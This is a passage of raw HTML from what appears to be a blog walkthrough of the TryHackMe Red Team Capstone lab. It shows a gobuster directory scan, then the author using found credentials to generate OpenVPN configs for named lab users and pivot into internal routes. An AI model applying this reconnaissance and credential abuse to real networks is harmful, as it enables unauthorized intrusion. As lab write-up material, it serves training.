https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?w=1281&amp;ssl=1 1281w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"20-gobuster-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">GoBuster<\/mark><\/h5>\n\n\n\n<p>GoBuster was able to find a directory <code>\/vpn<\/code>. Visiting the directory, we see a <code>OpenVPN<\/code> file. We can download the file and read it.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone\/VPN]\n\u2514\u2500$ gobuster dir -u http:\/\/vpn.thereserve.loc -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-directories.txt \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/vpn.thereserve.loc\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-directories.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/vpn                  (Status: 301) [Size: 322] [--&gt; http:\/\/vpn.thereserve.loc\/vpn\/]\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone\/VPN<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">gobuster<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">dir<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/vpn.thereserve.loc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-w<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-directories.txt<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Gobuster<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v3.6<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">by<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OJ<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Reeves<\/span><span style=\"color: #BABED8\"> (@TheColonial) <\/span><span style=\"color: #89DDFF\">&amp;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Christian<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Mehlmauer<\/span><span style=\"color: #BABED8\"> (@firefart)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Url:                     http:\/\/vpn.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Method:                  GET<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Threads:                 10<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Wordlist:                \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-directories.txt<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Negative Status codes:   404<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> User Agent:              gobuster\/3.6<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Timeout:                 10s<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">gobuster<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">directory<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">enumeration<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mode<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\/vpn<\/span><span style=\"color: #BABED8\">                  (Status: <\/span><span style=\"color: #F78C6C\">301<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">322<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">--<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> http:\/\/vpn.thereserve.loc\/vpn\/<\/span><span style=\"color: #89DDFF\">]<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910799a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910799a\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"916\" height=\"364\" data-attachment-id=\"468\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206100314\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100314.png?fit=916%2C364&amp;ssl=1\" data-orig-size=\"916,364\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206100314\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100314.png?fit=916%2C364&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100314.png?resize=916%2C364&#038;ssl=1\" alt=\"\" class=\"wp-image-468\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100314.png?w=916&amp;ssl=1 916w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100314.png?resize=300%2C119&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100314.png?resize=768%2C305&amp;ssl=1 768w\" sizes=\"auto, (max-width: 916px) 100vw, 916px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This seems like a default template for the OpenVPN file. We cannot make use of it since there is no remote IP information so we won&#8217;t be able to connect to a VPN server.<\/p>\n\n\n\n<p>After logging in with the credentials we found, we can click on the <code>submit<\/code> button by typing a username and it downloads an OpenVPN file with the username we typed.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"455\" data-attachment-id=\"469\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206114314\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?fit=2050%2C911&amp;ssl=1\" data-orig-size=\"2050,911\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206114314\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?fit=1024%2C455&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?resize=1024%2C455&#038;ssl=1\" alt=\"\" class=\"wp-image-469\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?resize=1024%2C455&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?resize=300%2C133&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?resize=768%2C341&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?resize=1536%2C683&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114314.png?resize=2048%2C910&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>On comparing the file that we just downloaded with the template, we noticed that this file has remote IP information&#8211;which means we can use the file to connect to a VPN server.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone\/VPN]\n\u2514\u2500$ head corpUsername.ovpn                       \nclient\ndev tun\nproto tcp\nsndbuf 0\nrcvbuf 0\nremote 10.200.X.X 1194\nresolv-retry infinite\nnobind\npersist-key\npersist-tun\n                                                                                                   \n\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone\/VPN]\n\u2514\u2500$ head laura.wood@corp.thereserve.loc.ovpn \nclient\ndev tun\nproto tcp\nsndbuf 0\nrcvbuf 0\nremote 10.200.113.12 1194\nresolv-retry infinite\nnobind\npersist-key\npersist-tun\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone\/VPN<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">head<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">corpUsername.ovpn<\/span><span style=\"color: #BABED8\">                       <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">client<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">dev<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tun<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">proto<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tcp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">sndbuf<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">rcvbuf<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">remote<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.200<\/span><span style=\"color: #C3E88D\">.X.X<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1194<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">resolv-retry<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">infinite<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">nobind<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">persist-key<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">persist-tun<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                                                                                                   <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone\/VPN<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">head<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">laura.wood@corp.thereserve.loc.ovpn<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">client<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">dev<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tun<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">proto<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tcp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">sndbuf<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">rcvbuf<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">remote<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.200<\/span><span style=\"color: #C3E88D\">.113.12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1194<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">resolv-retry<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">infinite<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">nobind<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">persist-key<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">persist-tun<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091081c6&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091081c6\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"561\" data-attachment-id=\"470\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206114529\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?fit=1609%2C881&amp;ssl=1\" data-orig-size=\"1609,881\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206114529\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?fit=1024%2C561&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?resize=1024%2C561&#038;ssl=1\" alt=\"\" class=\"wp-image-470\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?resize=1024%2C561&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?resize=300%2C164&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?resize=768%2C421&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?resize=1536%2C841&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?w=1609&amp;ssl=1 1609w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Connecting via <code>laura.wood<\/code> file, we did not see anything interesting in the output but with <code>mohammad.ahmed<\/code>, we see a couple of new IPs. These IPs are automatically added to our route.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091088d8&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091088d8\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"182\" data-attachment-id=\"471\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206114943\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?fit=1251%2C222&amp;ssl=1\" data-orig-size=\"1251,222\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206114943\" data-image-description=\"\" data-image-caption=\"\" 